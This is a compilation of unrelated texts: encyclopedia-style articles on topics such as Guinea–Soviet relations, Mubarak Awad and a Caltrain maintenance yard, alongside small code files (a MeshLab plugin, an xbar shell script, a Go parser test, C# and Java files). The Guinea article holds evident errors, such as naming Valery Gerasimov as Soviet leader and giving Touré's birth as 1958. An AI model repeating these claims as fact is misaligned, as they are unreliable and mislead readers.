editPoint = new QAction(QIcon(":/images/select_vertex_geodesic.png"),"Select Vertex Clusters", this);
editPointFittingPlane = new QAction(QIcon(":/images/select_vertex_plane.png"),"Select Vertices on a Plane", this);
actionList.push_back(editPoint);
actionList.push_back(editPointFittingPlane);
foreach(QAction *editAction, actionList)
editAction->setCheckable(true);
}
QString PointEditFactory::pluginName() const
{
return "EditPoint";
}
//get the edit tool for the given action
EditTool* PointEditFactory::getEditTool(const QAction *action)
{
if(action == editPoint)
return new EditPointPlugin(EditPointPlugin::SELECT_DEFAULT_MODE);
else if (action == editPointFittingPlane)
return new EditPointPlugin(EditPointPlugin::SELECT_FITTING_PLANE_MODE);
assert(0); //should never be asked for an action that isn't here
return nullptr;
}
QString PointEditFactory::getEditToolDescription(const QAction *)
{
return EditPointPlugin::info();
}
MESHLAB_PLUGIN_NAME_EXPORTER(PointEditFactory)
```
|
Guinea–Soviet Union relations were bilateral economic, military, and political relations between the Soviet Union and Guinea. Modeled after the Soviet financial successes during the Cold War, the development model was based upon communist and socialist institutions. With tensions between the Soviet Union and the United States on the world stage, the nations opted to use their political influences, promoting communist and capitalist ideologies respectively to gain power. Declaring independence from French colonial rule on October 2, 1958, Guinea was in need of economic and structural support. The Soviet Union provided financial and military support to Guinea, using Guinea's needs to gain a political advantage in the developing world. However, their plans were quickly undermined as their model failed to succeed due to unaccounted cultural and social differences between the Soviet Union and Guinea.
Historical background
Following the Second World War, the Soviet economy achieved significant economic growth. This was executed via an increase in employment and the enforcement of fixed capital, which led to a rise in efficiency and a fall in production costs. The resulting increases in production and economic productivity led to rapid economic growth across the USSR during the 1950s. As a result of this success, the USSR established stable financial systems. These successes made the model successful enough to export their systems globally and proliferate their economic model around the world. Newly independent from French colonial rule, Guinea was struggling as a nation to effectively implement structural systems. Their medical system was inadequate for their population of 2.8 million and an estimated ninety percent of children were not enrolled in school. Guinea was looking for the structural assistance the USSR was eager to supply. Between 1957 and 1964, the Soviet Union attempted to implement their economic and social structures within West Africa, Ghana, and Guinea, anticipating triumphs similar to their previous domestic development projects, operating under the impression that their system was superior to any other.
USSR
Socialism and Cold War politics
From the perspective of the USSR, the Third World was an opportunity for the proliferation of Soviet socialism. Rather than competing with the US through military power, the USSR opted to compete using their economic and social models, spreading their ideas around the world in an effort to undermine the American equivalent: capitalist ideologies. With the rapid growth of the USSR and their emergence as a world superpower, Nikita Khrushchev, the First Secretary of the Communist Party of the Soviet Union, was confident in the economic model and its ability to succeed in other parts of the world.
The Third World was the key player in the Soviet's political strategy. Many countries were seeking out foreign support following their hardfought independence from colonial powers and were vulnerable to the political agendas of the Cold War. Guinea was especially advantageous geopolitically, with available bases for naval and reconnaissance forces. The location was a strategic advantage for the Soviets as they would be able to monitor Western navy movements and pose a threat to Western powers. Additionally, Guinea was also rich in natural resources, further attracting the Soviets with the promise of bauxite and diamonds.
Guinea
Guinean independence
Born in 1958, Sékou Touré president of the Republic of Guinea, voted “non” in the referendum held by French President Charles De Gaulle on limited autonomy within the French colonial rule. Being the sole French colony that voted against limited autonomy, Guinea was left to handle the consequences of the immediate departure of the French. Facing many difficulties following their independence from colonial domination, the Guinean government found themselves in need of support from foreign entities. With the retaliation of France, Guinea was not only short in administrative personnel, but also were in a trade deficit with inefficient exportation measures.
Guinea–Soviet policy goals
As a newly independent country, Guinea required economic support and recognition. As a neutral country with no bias towards either of the two Super Powers, they first sought help from the United States. Considering further geopolitics, nations including the US and the United Kingdom were unwilling to provide help to Guinea, attempting to prevent conflict with France. The Soviets used this opportunity to act quickly. Soviet leader Valery Gerasimov met with President Touré to discuss economic and cultural ties in addition to Soviet aid. Guinea's military dependence on the Soviet Union was one of the driving forces behind their motivation for this alliance.
Guinea soon received aid from the Communist Bloc, amounting to a loan of approximately US$127 million, the majority of which was provided by the Soviet Union. Guinea was in need of economic and technical assistance alongside aid in development of human capital, scholarships, and other programs offered by the Soviets. With aid from the Communist Bloc, Guinea was placed within the “Soviet orbit.” With Russian, Eastern European, and Chinese diplomats working in Guinea, Guinea began to solidify their relations with the Soviet Union and culturally shifted away from their neighboring African nations. Given their new association with one of the Great powers, Touré was motivated to legitimize the socialist regime. By the end of 1959, Guinea signed a commercial treaty and economic cooperation agreement with the USSR.
Soviet development model
Economy
While there were many successes to implementation of decolonization policies including shifts in political power and governmental structures, Guinea struggled in the economic sector. The Soviets were eager to provide aid and support for economic growth. This economic assistance was given without regulations on its use, allowing aid to be used for show pieces such as printing plants, jets, sports stadiums, and hotels, rather than on the improvement of Guinean productivity. Moscow was highly dissatisfied with Guinea's use of funds for inefficient projects that did little to improve the country's economy. In addition to aid being inefficiently used, Russian agricultural equipment was also poorly made and inapt for Guinea, further impeding the advancement of productivity.
The USSR lacked adequate knowledge of Guinea's unique geographical economy. Colonial domination left African economies underdeveloped and heavily reliant on one sided trade with exports of raw materials to Western countries. As a result, the Soviet economic aid failed to create an efficient monetary system. Furthermore, the USSR had provided low quality machines and equipment, hampering Guinea's production and trade. Soviet economic intervention was overall unsuccessful and much more expensive for the Soviets than anticipated. Ultimately, this led to the abandonment of Guinea by the Soviets.
Guinea, built upon colonial dependency, was determined to break from its European economic decent and foster development. In an attempt to develop their national economy, Guinea set up trade monopolies which resulted in extreme costs for their consumers, high levels of corruption, and black markets. Guinea was also confronted with the relatively low value of their currency and the subsequent impact on trade. Guinean officials would often smuggle goods across borders and sell them for higher currency prices to compensate for the value of currency.
Soviet military assistance
From 1959 onwards, Guinea received military aid from the Soviet Union and its satellite states. Soon after the opening of the Soviet Embassy in Conakry, Guinea received free arms from Czechoslovakia, along with a group of advisers. The supplies included 6,000 rifles, 6,000 hand grenades, 1,000 automatic handguns, about 500 bazookas, 20 heavy machine guns, 6 mortars, 6 small cannons, as well as 10 large tents, 10 sidecars, 5 field kitchens, and 2 armored Škodas, all supplied to a Guinean army of 3500 soldiers. According to French intelligence, “the value of only the first batch [of Czechoslovakian weapons] exceeds Guinea’s entire military budget.” The Guinean Army increased further during the Portuguese invasion of Conakry. Reports indicate that additional tanks, armored personnel carriers, and artillery were provided by the Soviets and the Communist Bloc.
Military assistance continued following the establishment of diplomatic ties between the Soviet Union and Guinea. According to a study, "Between 1955 and 1970 the Soviet Union had been Guinea's sole supplier of combat aircraft, training aircraft, helicopters, tanks, and armoured personnel carriers (APC), and had supplied over sixty percent of Guinea's transport aircraft."
Between 1955 and 1978, a total of 1290 Guinean military personnel were trained in communist countries, and a total of 330 communist military technicians were present in Guinea in 1978. Along with material aid, the Soviets also extended help in building schools and providing scholarships for Guineans to get technical training in the USSR.
The Soviet-Guinea relationship was briefly diminished following the expulsion of the Soviet Ambassador, Daniel Solod from Guinea in December 1961. The tension was a result of several factors, the primary being the “Teacher’s Plot,” an attempt to overthrow president Touré. Soon after, Moscow appointed its First Deputy Premier, Anastas Mikoyan to Guinea in January 1962. This time, along with weapons, the Soviets announced a new Soviet loan of US$10 million to subsidize military costs.
Geopolitical significance
The Soviet investment in the Guinean military stretched beyond altruistic assistance. Assisting Guinea's military served the USSR's geopolitical interests, as the Guinean military checkpoints could be used during times of crisis. Among the most important checkpoints were the Conakry airport, which had a strategic importance during the Angola War of Independence, Cuban Missile Crisis, and the Guinea-Bissau conflict. During the Angolan conflict, Guinea's port was used for aircraft refueling and for the transport of arms by sea. During the Cuban Missile Crisis in 1962, the Soviets requested landing rights at Conakry for reinforcement airlifts en route to Cuba. However, the USSR's request was rejected by President Touré, who had emphasized the country's neutrality. In 1969, the Soviet established a permanent naval base on the Indian Ocean which was serviced by the Somalian facilities until 1977. Similarly, the Soviets established a permanent West African patrol in 1970, allowing them access to Guinea-Bissau, and later, Angola. Guinea's strategic location on the West coast of Africa made it an important logistic base for Soviet naval forces to monitor Western navy movements, and threaten Western sea lines of communication (SLOCs). Until mid-1978, the airport facilities in Conakry were also used as a stopover point to facilitate aircraft travel to Cuba from the Soviet Union and vice versa, using Guinea's strategic location to their full advantage.
On various occasions, the Soviet Union attempted to gain authorization from the Guinean government to launch its naval activities in Guinea's ports. The first appearance of the Soviet navy was in 1969, with a group of Soviet warships visiting Conakry. By 1971, the Soviet warships were regularly using Conakry as a base of operations for the West African coast. However, there was reluctance on the part of the Guinean government in regards to the Soviet requests for the establishment and use of military bases, going so far as to revoke the right of the Soviet military's use of the Conakry airport. Similarly, reports mention that Touré had refused to allow Soviet advisers and Cuban troops to assemble in Guinea en route to Ethiopia in 1977.
Shift in relations
Despite the persistent presence of the Soviet Bloc, the 1970s were a turning point for Guinean relations with neighboring countries and with Western nations. The move away from their alliance with the USSR was not the result of a single action. However, the inability to rehabilitate the Guinean economy and strict bartering terms were a significant factor. Moreover, the increased interference from the Soviets in Guinea's ports, as well as its role in many of the uprisings against president Touré, weakened the relationship between the two nations. This, in addition to the Soviet's interventions in Guinea's internal governmental affairs deteriorated their alliance, eventually leading to the slow departure of the USSR from Guinea. Today, Russia and Guinea have maintained positive relations, even without the official alliance of the Eastern Bloc. Guinea remains a key economic outpost for Russia, still a mining resource and sponsored by Russian investment.
References
Bilateral relations of Guinea
Bilateral relations of the Soviet Union
Guinea–Russia relations
|
The 1977 German Formula Three Championship () was a multi-event motor racing championship for single-seat open wheel formula racing cars held in Germany and in Belgium. The championship featured drivers competing in two-litre Formula Three racing cars which conformed to the technical regulations, or formula, for the championship. It commenced on 27 March at Nürburgring and ended at the same place on 2 October after eight rounds.
Team Obermoser Jörg driver Peter Scharmann became a champion. He won race at Kassel-Calden. Rudolf Dötsch finished as runner-up, he had three race wins, but he haven't participated in the three races. Heinz Scherle completed the top-three in the drivers' standings with win at Diepholz Airfield Circuit. Bertram Schäfer and Werner Klein were the only other drivers who won a race in the season.
Calendar
All rounds were held in West Germany, excepting Zolder rounds that were held in Belgium.
Championship standings
Points are awarded as follows:
References
External links
German Formula Three Championship seasons
Formula Three season
|
```shell
#!/bin/bash
# <xbar.title>Persian Date</xbar.title>
# <xbar.version>v0.1</xbar.version>
# <xbar.author>Ilia Vakili</xbar.author>
# <xbar.author.github>theReticent</xbar.author.github>
# <xbar.desc>Shows Persian date</xbar.desc>
# <xbar.image></xbar.image>
# <xbar.dependencies>jcal</xbar.dependencies>
# To fix the "command not found" caused by installing jcal using brew
PATH=/usr/local/bin:$PATH
jdate "+%W"
echo "---"
jdate "+%G %d %V %Y"
```
|
Tom Reynolds (born 1960 in Wisconsin) is an American author and television producer. He wrote the popular books I Hate Myself and Want to Die and Touch Me, I'm Sick. He also wrote Wild Ride: How Outlaw Motorcycle Myth Conquered America. This book was based on his 1999 documentary. He currently lives in Nacogdoches, Texas, where he teaches Speech and English at Stephen F. Austin State University.
Books
He wrote the popular books I Hate Myself and Want to Die and Touch Me, I'm Sick. He also wrote Wild ride: how outlaw motorcycle myth conquered America.
Television
In 1996, he transitioned into television, writing and producing over 90
hours of TV programming, including documentaries and non-fiction specials for A&E, Dick
Wolf Productions, Travel Channel, E! Entertainment, and Warner Brothers Television. He produced several television programs including documentaries including The Wild Ride of Outlaw Bikers (1999). He was also a writer on Illuminating Angels & Demons (2005).
Notes
External links
Living people
People from Nacogdoches, Texas
Stephen F. Austin State University faculty
Writers from California
Writers from Texas
Writers from Wisconsin
1960 births
|
Mubarak Awad is a Palestinian-American psychologist and an advocate of nonviolent resistance.
Early life and move to the United States
Awad, a Palestinian Christian (a member of the Greek Orthodox Church), was born in 1943 in Jerusalem when it was under the British Mandate. When Awad was five years old, his father was killed during the 1948 Arab–Israeli War and he became a refugee in the Old City of Jerusalem. His mother was a pacifist and argued against revenge. He was given the right to Israeli citizenship in 1967 when East Jerusalem was annexed by Israel after the Six-Day War but refused and kept his Jordanian citizenship.
Mennonite and Quaker missionaries influenced Awad's views in his youth. In the 1960s he moved to the United States to study at the Mennonite Bluffton University and received a BA in social work and sociology. He went on to obtain an MS in education from Saint Francis University and a PhD in psychology from the International Graduate School of Saint Louis University.
He was granted U.S. citizenship in 1978 and settled in a small town in Ohio.
Career
National Youth Advocate Program
Awad was the founder and former president of the National Youth Advocate Program (NYAP) in the United States. The organization developed from the Ohio Youth Advocate Program (OYAP) established by Awad in 1978 with support from the Ohio Youth Commission (now the Department of Youth Services), the state department responsible for finding placements for "at risk" youth referred to the state from county juvenile courts.
As an offshoot of NYAP, he later founded and directed Youth Advocate Program International, headquartered in Washington, DC. According to the website, "The Youth Advocate Program International, Inc. (YAP International) is a 501(c)(3) non-profit organization. It established its headquarters and advocacy center in Washington, DC in 1996. YAP International's mission is to promote and protect the rights and well-being of the world's youth, giving particular attention to children victimized by conflict, exploitation, and state and personal violence."
Palestinian Centre for the Study of Nonviolence
In 1983 Awad returned to Jerusalem and established the Palestinian Centre for the Study of Nonviolence. Before the intifada, Awad published papers and lectured on nonviolence as a technique for resisting the Israeli occupation. He wrote that nonviolence could be used as a means of resistance. The Centre also sponsored a number of nonviolent actions during the early months on the first intifada. Among the tactics employed was the planting of olive trees on proposed Israeli settlements, asking people not to pay taxes and encouraging people to eat and drink Palestinian products. In the Middle East he is often referred to as the Arab Gandhi due to the similarity between his teachings of the power of nonviolence and those of Mahatma Gandhi in India during the British Raj. He believed these tactics could be used to resist the Israeli military occupation. He also drew upon the methodologies of Gene Sharp's trilogy, The Politics of Non-Violence. Using this knowledge and his experience, Awad prepared his own "12-page blueprint for passive resistance in the territories," eventually published in the Journal of Palestine Studies. He has translated into Arabic the teachings of Mohatma Gandhi and Martin Luther King. In 1998 Holy Land Trust (HLT) was established out of PCSN and The Journey of the Magi (JOM) by Sami Awad, Mubarak Awad's nephew.
Deportation by Israel
In 1987, Awad attempted to renew the residency permit he had been issued in 1967. His application was declined and he was ordered to leave the country when his tourist visa expired. Awad claimed, with strong support from U.S. consular officials, that under international conventions Israel did not have the right to expel him from his place of birth and he refused to leave. The Israeli government stayed the deportation order mainly at the insistence of the U.S. In May 1988, Prime Minister Yitzhak Shamir ordered Awad arrested and expelled. Officials charged that Awad broke Israeli law by inciting "civil uprising" and helping to write leaflets that advocated civil disobedience that were distributed by the leadership of the First Intifada. No evidence was provided to support the charge and Awad appealed the decision to the Supreme Court. The court ruled that he had forfeited his right to residence status in Israel when he became a U.S. citizen and he was deported in June 1988. U.S. Secretary of State George Shultz's appeal to Shamir to revoke the deportation order was declined. Ian Lustick, professor of political science at the University of Pennsylvania, cited the ruling in Awad's case as one of a number of examples that he argues demonstrate that "[t]here has never been an official act that has declared expanded East Jerusalem as having been annexed by the State of Israel."
Criticism
Critics argue that Awad advocated violence under the guise of calling it civil disobedience. In a 1984 article for the Journal of Palestine Studies, Awad stated, "for the Palestinians living in the West Bank and Gaza the most effective strategy is nonviolence. This does not apply to the Palestinians living outside. Nor is it a rejection of the concept of armed struggle. This is nothing short of war." Awad called to "block roads, prevent communications, cut electricity, telephone, and water lines, prevent the movement of equipment, and in other ways obstruct the government." The article speaks openly about throwing stones. Awad's article called for a campaign of harassment against Israelis and for "psychological warfare" to "demoralize" the population. He also called for "the destruction of Israeli fences and power lines," according to Time Magazine.
Awad has called for Israel to be replaced with Palestine. In a Jerusalem speech to Palestinian students he said "the PLO wants the entire Palestine and I agree. Palestine for me is the Galilee, Akko, Ashdod, everything. This is Palestine for me." Dr. Shlomo Riskin, founding chief rabbi of the Israeli settlement of Efrat in the West Bank, called him "an articulate wolf in sheep`s clothing" who "clearly represents a threat to the lives of Israeli citizens." Israeli diplomat Moshe Arad in a New York Times article decried Awad who he claimed took American citizenship, in accordance with immigration law, which required that he 'intends to reside permanently in the U.S. and then turned around and claimed to the Israeli Supreme Court that his intention was always to reside in Jerusalem. "Nonviolence as merely a convenient tactic... incitement and acts of violence - are these the watchwords of a man truly committed to peace and moderation? No. Western audiences do not hear these Awad views in English. But his local audiences hear them in Arabic," Arad said.
Nonviolence International
In 1989, Awad founded Nonviolence International, a non-governmental organization in Special Consultative Status with the United Nations Economic and Social Council. Nonviolence International's stated mission is to promote nonviolent action and seek to reduce the use of violence worldwide.
Academic career
Awad has taught at the American University in Washington, D.C. since the early 1990s. He is an Adjunct Professor in the School of International Service where he teaches classes in the theories and methods of nonviolence.
See also
Palestinian Christians
List of peace activists
Notes
Citations
Sources
Publications
External links
Photograph of Mubarak Awad
Nonviolence in the Middle East: A Talk with Mubarak Awad
Nonviolence International
Non-Violent Resistance: A Strategy for the Occupied Territories
The Missing Mahatma: Searching for a Gandhi or a Martin Luther King in the West Bank, by Gershom Gorenberg, Weekly Standard, 4/06/2009. Detailed history of Palestinian nonviolence, including interview with Mubarak Awad and discussion of his role, by an Israeli historian.
1943 births
American University faculty and staff
American activists
American people of Palestinian descent
Eastern Orthodox Christians from Palestine
Living people
Nonviolence advocates
People from Jerusalem
|
The Caltrain Centralized Equipment Maintenance and Operations Facility (CEMOF) is a train maintenance yard and facility located to the north of San Jose Diridon Station in Central San Jose, California. The $140 million maintenance station began construction in 2004 and opened in 2007, consolidating much of Caltrain's maintenance and operations into one location.
History
Planning for CEMOF started in the late 1980s under Caltrans; up to that point, light maintenance was being performed at yards in San Francisco and San Jose, and heavier maintenance required transporting equipment to Roseville, a trip that took two days each way. The only maintenance pit was in San Jose, just a single car length long. All locomotive maintenance was performed in Oakland, and wheels were resurfaced at an Amtrak shop in Wilmington, Delaware. Consolidating operations into a single facility was estimated to reduce annual costs by $425,000 to $530,000 for transportation.
Work on the USD $140 million project began in October 2004, with USD $105.8 million coming from federal funding and USD $8.2 million from state funding. The construction phase of the facility lasted approximately three years; preliminary work completed in 2005 included relocation of existing rail lines and utilities, a wall to attenuate construction noise, and a tunnel to link the maintenance facilities with the east yard. Work on the new buildings and facilities began in summer 2005. On September 29, 2007, Caltrain held a grand opening ceremony. The first shift of maintenance and operations crew did not move into the new shop until October 21, followed by the second and third shifts in November. The last component of this yard, the fueling storage and station, was completed in Spring 2008.
To accommodate maintenance requirements for the new Stadler KISS electric multiple units (EMUs) being procured as part of the electrification of Caltrain project, CEMOF was modified starting in 2019. Modifications included the extension of the existing Service and Inspection Pit, allowing the underside of a seven-car EMU train to be inspected without repositioning; adding moveable platforms inside the shop for inspection and maintenance of roof-mounted equipment; adding pantograph inspection cameras to inspect each car at least once a day; and building a temporary storage facility for EMU parts while the current warehouse is occupied by parts for the diesel-based fleet.
Description
Caltrain's CEMOF replaced an old Southern Pacific Railroad maintenance yard formerly located on the same site. The entire facility includes a central control building, a three floor, maintenance shop building, a machine to wash trains, one water treatment plant, a fueling station and railroad tracks for train storage. About 150 people work at the site and three shifts of workers keep the facility staffed at all times.
The Train Washer is an automated washing machine that cleans the exterior of half of Caltrain's fleet each day or at least twice a week, up from twice a year before the facility. The machine can clean a five-car train in about 25 minutes using water from two cisterns. The water used in the cleaning process is processed through the Wastewater Treatment Unit and 80% is reused to wash another train. The Washer is located to the northwest of the maintenance shop.
The Shop Building contains a bridge crane with a lifting capacity of , a drop table to facilitate wheel maintenance, and a wheel truing facility. This new building improves servicing conditions, safety, and efficiency by allowing mechanics to work indoors rather than outdoors. In addition, Caltrain can perform maintenance tasks once conducted by out-of-state contractors, such as wheel-truing.
Daily repair tasks are carried out in the Service & Inspection Area, consisting of an outdoor facility with two pits each long and deep. There are two tracks that traverse the facility. In Spring 2008, a fuel tank was installed there to facilitate on-site fueling; prior to its installation, refueling trains was performed by bringing tanker trucks alongside the trains. The Service & Inspection Area is located immediately adjacent to the northeast of the three story Shop Building.
The train maintenance facilities are separated from the east yard area by active railroad tracks, so a tunnel was built to facilitate employee movement under the active tracks. Work on the east yard area, which contains the Loading Dock, Central Control Facility (housing railroad dispatchers and controllers), and modular buildings for conductors and engineers, began in June 2006.
See also
Caltrain
References
External links
CEMOF Project main page
Buildings and structures in San Jose, California
Railway buildings and structures in California
Transportation in San Jose, California
Railway workshops in the United States
Transportation buildings and structures in Santa Clara County, California
2007 establishments in California
|
```yaml
#
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
#
# path_to_url
#
# Unless required by applicable law or agreed to in writing, software
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
name: pg_attribute
columns:
attrelid:
caseSensitive: true
dataType: -5
generated: false
name: attrelid
primaryKey: false
unsigned: false
visible: true
attname:
caseSensitive: true
dataType: 12
generated: false
name: attname
primaryKey: false
unsigned: false
visible: true
atttypid:
caseSensitive: true
dataType: -5
generated: false
name: atttypid
primaryKey: false
unsigned: false
visible: true
attstattarget:
caseSensitive: true
dataType: 4
generated: false
name: attstattarget
primaryKey: false
unsigned: false
visible: true
attlen:
caseSensitive: true
dataType: 5
generated: false
name: attlen
primaryKey: false
unsigned: false
visible: true
attnum:
caseSensitive: true
dataType: 5
generated: false
name: attnum
primaryKey: false
unsigned: false
visible: true
attndims:
caseSensitive: true
dataType: 4
generated: false
name: attndims
primaryKey: false
unsigned: false
visible: true
attcacheoff:
caseSensitive: true
dataType: 4
generated: false
name: attcacheoff
primaryKey: false
unsigned: false
visible: true
atttypmod:
caseSensitive: true
dataType: 4
generated: false
name: atttypmod
primaryKey: false
unsigned: false
visible: true
attbyval:
caseSensitive: true
dataType: -7
generated: false
name: attbyval
primaryKey: false
unsigned: false
visible: true
attstorage:
caseSensitive: true
dataType: 1
generated: false
name: attstorage
primaryKey: false
unsigned: false
visible: true
attalign:
caseSensitive: true
dataType: 1
generated: false
name: attalign
primaryKey: false
unsigned: false
visible: true
attnotnull:
caseSensitive: true
dataType: -7
generated: false
name: attnotnull
primaryKey: false
unsigned: false
visible: true
atthasdef:
caseSensitive: true
dataType: -7
generated: false
name: atthasdef
primaryKey: false
unsigned: false
visible: true
attisdropped:
caseSensitive: true
dataType: -7
generated: false
name: attisdropped
primaryKey: false
unsigned: false
visible: true
attislocal:
caseSensitive: true
dataType: -7
generated: false
name: attislocal
primaryKey: false
unsigned: false
visible: true
attcmprmode:
caseSensitive: true
dataType: -6
generated: false
name: attcmprmode
primaryKey: false
unsigned: false
visible: true
attinhcount:
caseSensitive: true
dataType: 4
generated: false
name: attinhcount
primaryKey: false
unsigned: false
visible: true
attcollation:
caseSensitive: true
dataType: -5
generated: false
name: attcollation
primaryKey: false
unsigned: false
visible: true
attacl:
caseSensitive: true
dataType: 2003
generated: false
name: attacl
primaryKey: false
unsigned: false
visible: true
attoptions:
caseSensitive: true
dataType: 2003
generated: false
name: attoptions
primaryKey: false
unsigned: false
visible: true
attfdwoptions:
caseSensitive: true
dataType: 2003
generated: false
name: attfdwoptions
primaryKey: false
unsigned: false
visible: true
attinitdefval:
caseSensitive: true
dataType: -2
generated: false
name: attinitdefval
primaryKey: false
unsigned: false
visible: true
attkvtype:
caseSensitive: true
dataType: -6
generated: false
name: attkvtype
primaryKey: false
unsigned: false
visible: true
indexes:
pg_attribute_relid_attnam_index:
name: pg_attribute_relid_attnam_index
pg_attribute_relid_attnum_index:
name: pg_attribute_relid_attnum_index
```
|
Edgbastonia alanwillsi is a species of minute freshwater snail with an operculum, an aquatic gastropod mollusc or micromollusc in the family Hydrobiidae. It is currently the sole species within the genus Edgbastonia.
E. alanwillsi is endemic to western Queensland, Australia. It is only found in a small group of springs in the Edgbaston Reserve near Aramac, where it is assumed to be relictual.
See also
List of non-marine molluscs of Australia
References
External links
Hydrobiidae
Gastropods of Australia
Endemic fauna of Australia
Gastropods described in 2008
Freshwater molluscs of Oceania
|
In the Korisliiga, the top Finnish professional basketball league, two awards are considered the Most Valuable Player award. The first, the Player of the Year, goes to the best Finnish player in the league. The second, is the Best Foreigner (in Finnish, vuoden ulkomaalaisvahvistus).
Key
Import Players
Finnish Players
Notes
References
Basketball most valuable player awards
MVP
European basketball awards
|
Chetrosu is a commune in the Anenii Noi District of the Republic of Moldova. It is composed of two villages, Chetrosu and Todirești.
References
Communes of Anenii Noi District
|
```go
package rewrite
import (
"strings"
"testing"
"github.com/coredns/caddy"
)
func TestParse(t *testing.T) {
tests := []struct {
inputFileRules string
shouldErr bool
errContains string
}{
// parse errors
{`rewrite`, true, ""},
{`rewrite name`, true, ""},
{`rewrite name a.com b.com`, false, ""},
{`rewrite stop {
name regex foo bar
answer name bar foo
}`, false, ""},
{`rewrite stop name regex foo bar answer name bar foo`, false, ""},
{`rewrite stop {
name regex foo bar
answer name bar foo
name baz
}`, true, "2 arguments required"},
{`rewrite stop {
answer name bar foo
name regex foo bar
}`, true, "must begin with a name rule"},
{`rewrite stop`, true, ""},
{`rewrite continue`, true, ""},
}
for i, test := range tests {
c := caddy.NewTestController("dns", test.inputFileRules)
_, err := rewriteParse(c)
if err == nil && test.shouldErr {
t.Fatalf("Test %d expected errors, but got no error\n---\n%s", i, test.inputFileRules)
} else if err != nil && !test.shouldErr {
t.Fatalf("Test %d expected no errors, but got '%v'\n---\n%s", i, err, test.inputFileRules)
}
if err != nil && test.errContains != "" && !strings.Contains(err.Error(), test.errContains) {
t.Errorf("Test %d got wrong error for invalid response rewrite: '%v'\n---\n%s", i, err.Error(), test.inputFileRules)
}
}
}
```
|
Vivian Alan James MacKerrell (23 May 1944 – 2 March 1995) was a British actor of the 1960s and 1970s. He was the basis for the character of Withnail in the film Withnail and I.
Early life
Vivian MacKerrell was the son of Scottish accountant John Alexander McKerrell and Janetta Mary (née Boyns). The family were "well-off". He had two brothers, Jock and David. MacKerrell attended the private Trent College near Nottingham.
Personality
As a student at the Central School of Speech and Drama in London, he shared a house in Albert Street, Camden, London with the musician David Dundas and film director Bruce Robinson, writer and director of Withnail & I (1987). Another house mate, actor Michael Feast, described MacKerrell as a "splenetic wastrel of a fop", whilst Robinson has said he was a "jack of all but a master of none", declaring himself a great actor but doing nothing to prove this. Robinson has also stated that MacKerrell was the funniest person he has ever met.
A biography of MacKerrell, Vivian and I, by Penzance-based author Colin Bacon was published in 2010.
Career
In the early 1960s, MacKerrell performed with Ian McKellen in Saturday Night and Sunday Morning and with John Neville in Coriolanus at Nottingham Playhouse, where he also worked as assistant stage manager. In the 1970s, he was the junior lead in Hadrian VII at the Mermaid Theatre.
MacKerrell had only a handful of television and film credits, which included a Play for Today, titled "Edna, the Inebriate Woman" (1971), and Ghost Story (1974), a horror film that also starred Marianne Faithfull. He also appeared in the 1967 BBC television version of Pride and Prejudice as Mr Hurst, for which he was credited as Vivian James, an earlier stage name.
Illness and death
MacKerrell's career was curtailed by heavy drinking. He died from throat cancer, which he contracted in his 40s. After a short remission in the mid-1980s, the illness returned and MacKerrell underwent a laryngectomy. Unable to eat or drink, he resorted to injecting alcohol directly into his stomach. In his last days, MacKerrell contracted pneumonia after a drunken incident and died in Gloucester Royal Infirmary. His ashes were scattered on Loch Indaal on the island of Islay.
Bruce Robinson claimed that MacKerrell once drank lighter fluid and was unable to see for days after the incident. This is depicted in a scene from Withnail & I.
Screen roles
Bibliography
References
External links
1944 births
1995 deaths
Alumni of the Royal Central School of Speech and Drama
British male film actors
Deaths from esophageal cancer
Male actors from London
20th-century British male actors
People educated at Trent College
English people of Scottish descent
|
```xml
<?xml version="1.0" encoding="utf-8"?>
<baseline version="1.0">
<file name="TestBaselineExtraErrorFile.kt.test">
<error line="2" column="34" source="no-empty-class-body" />
</file>
<file name="TestBaselineFile.kt.test">
<error line="1" column="24" source="no-empty-class-body" />
</file>
<file name="some/path/to/TestBaselineExtraErrorFile.kt.test">
<error line="2" column="34" source="no-empty-class-body" />
</file>
<file name="some/path/to/TestBaselineFile.kt.test">
<error line="1" column="24" source="no-empty-class-body" />
</file>
</baseline>
```
|
```java
/*
*
*
* path_to_url
*
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
*/
package org.dartlang.vm.service.consumer;
// This file is generated by the script: pkg/vm_service/tool/generate.dart in dart-lang/sdk.
import org.dartlang.vm.service.element.ProtocolList;
@SuppressWarnings({"WeakerAccess", "unused"})
public interface ProtocolListConsumer extends Consumer {
void received(ProtocolList response);
}
```
|
```smalltalk
/* ====================================================================
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
path_to_url
Unless required by applicable law or agreed to in writing, software
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
==================================================================== */
namespace TestCases.HSSF.Record.Chart
{
using System;
using NPOI.HSSF.Record;
using NPOI.HSSF.Record.Chart;
using NUnit.Framework;
/**
* Tests the serialization and deserialization of the SeriesRecord
* class works correctly. Test data taken directly from a real
* Excel file.
*
* @author Glen Stampoultzis (glens at apache.org)
*/
[TestFixture]
public class TestSeriesRecord
{
byte[] data = new byte[] {
(byte)0x01,(byte)0x00, // category data type
(byte)0x01,(byte)0x00, // values data type
(byte)0x1B,(byte)0x00, // num categories
(byte)0x1B,(byte)0x00, // num values
(byte)0x01,(byte)0x00, // bubble series type
(byte)0x00,(byte)0x00 // num bubble values
};
public TestSeriesRecord()
{
}
[Test]
public void TestLoad()
{
SeriesRecord record = new SeriesRecord(TestcaseRecordInputStream.Create(0x1003, data));
Assert.AreEqual(SeriesRecord.CATEGORY_DATA_TYPE_NUMERIC, record.CategoryDataType);
Assert.AreEqual(SeriesRecord.VALUES_DATA_TYPE_NUMERIC, record.ValuesDataType);
Assert.AreEqual(27, record.NumCategories);
Assert.AreEqual(27, record.NumValues);
Assert.AreEqual(SeriesRecord.BUBBLE_SERIES_TYPE_NUMERIC, record.BubbleSeriesType);
Assert.AreEqual(0, record.NumBubbleValues);
Assert.AreEqual(16, record.RecordSize);
}
[Test]
public void TestStore()
{
SeriesRecord record = new SeriesRecord();
record.CategoryDataType = (SeriesRecord.CATEGORY_DATA_TYPE_NUMERIC);
record.ValuesDataType = (SeriesRecord.VALUES_DATA_TYPE_NUMERIC);
record.NumCategories = ((short)27);
record.NumValues = ((short)27);
record.BubbleSeriesType = (SeriesRecord.BUBBLE_SERIES_TYPE_NUMERIC);
record.NumBubbleValues = ((short)0);
byte[] recordBytes = record.Serialize();
